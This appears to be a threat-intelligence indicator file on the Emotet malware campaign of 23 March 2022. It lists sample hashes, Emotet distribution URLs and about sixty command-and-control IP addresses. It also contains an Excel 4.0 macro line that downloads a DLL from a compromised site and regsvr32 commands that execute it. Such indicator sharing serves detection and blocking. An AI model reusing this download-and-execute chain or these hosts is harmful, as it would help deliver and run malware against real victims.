-
Notifications
You must be signed in to change notification settings - Fork 10
/
e4_emotet_23.03.2022.txt
116 lines (96 loc) · 3.2 KB
/
e4_emotet_23.03.2022.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
Emotet 2022 | epoch4 | 23.03.2022 |
************************************************************************************************************
.xls 8d3ba952eed9cfe2ccfa5133ed236695b79eaf5bc76fc2affaed53ca8baba543
.dll 9ab9ed91e0eacdd7e11e410d7004b8d3d8adaf11d15eabf7ea83f16caa9abe1d
EXCEL.EXE C:\Users\Admin\AppData\Local\Temp\Details to update.xls
C:\Windows\SysWow64\regsvr32.exe -s ..\lnau.dll
C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Ytqhgzwngu\vqcfw.jdh
https://www.certika-bolivia.com/omeltxveatup/9Gb/
https://www.chotdonhang.com/noi-dung/w1hMfkjuwAne4W2epiP/
https://www.cristianleyton.com/wp-includes/y3Ug/
https://www.cfoodsnepal.com/index/rvAYVKkJgVWiCwt0wV/
https://www.charmingsoftech.com/css/mJQYPVknv/
https://www.cgaei.com/fonts/ABuQi/
https://www.cnrgroup.co.uk/cgi-bin/iRHPslY/
************************************************************************************************************
.xls d9a0aa5f99d919e690520b45b2d347fea866d803661fa7f4662061b18eeb1d80
.dll a2398435665f739741f2e7decd588a25d29db043295a27fbe95b4ac20536666e
************************************************************************************************************
Exec >>
EXCEL.EXE C:\Users\Admin\AppData\Local\Temp\Payment inquiry 2022-03-22_1901, US.xlsm
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "https://iqraacfindia.org/wp-admin/dG/", "..\whxc.dll")
C:\Windows\SysWow64\regsvr32.exe -s ..\whxc.dll
C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Fhvmwrxfnydein\qjsvswsqtneoqd.ftz"
************************************************************************************************************
.dll distro
https://iqraacfindia.org/wp-admin/dG/
https://carzino.atwebpages.com/assets/QwlhxhsYfkYntLW0haX/
https://biantarajaya.com/awstats-icon/VR5wDEvBj/
https://he.adar-and-ido.com/wp-admin/xk7D/
https://al-brik.com/vb/mMQlbHPCX/
https://www.digigoal.fr/wp-admin/VfU0aIj/
https://apexcreative.co.kr/adm/VdiKTcljSBORQRrsh66X/
c2's
51.91.76.89:8080
173.254.208.91:8080
149.56.128.192:443
120.50.40.183:80
160.16.218.63:8080
206.188.212.92:8080
46.55.222.11:443
79.172.212.216:8080
103.221.221.247:8080
58.227.42.236:80
192.99.251.50:443
185.157.82.211:8080
159.8.59.82:8080
51.91.7.5:8080
131.100.24.231:80
159.65.88.10:8080
195.201.151.129:8080
45.176.232.124:443
31.24.158.56:8080
50.30.40.196:8080
176.104.106.96:8080
153.126.146.25:7080
176.56.128.118:443
103.43.46.182:443
50.116.54.215:443
217.182.25.250:8080
110.232.117.186:8080
189.126.111.200:7080
45.142.114.231:8080
158.69.222.101:443
188.44.20.25:443
212.237.17.99:8080
151.106.112.196:8080
216.158.226.206:443
129.232.188.93:443
167.99.115.35:8080
1.234.21.73:7080
178.79.147.66:8080
209.126.98.206:8080
173.212.193.249:8080
72.15.201.15:8080
209.250.246.206:443
103.75.201.4:443
207.38.84.195:8080
138.185.72.26:8080
119.193.124.41:7080
5.9.116.246:8080
146.59.226.45:443
212.24.98.99:8080
45.118.115.99:8080
51.254.140.238:7080
103.75.201.2:443
203.114.109.124:443
101.50.0.91:8080
1.234.2.232:8080
195.154.133.20:443
107.182.225.142:8080
196.218.30.83:443
197.242.150.244:8080
82.165.152.127:8080
164.68.99.3:8080
185.8.212.130:7080
45.118.135.203:7080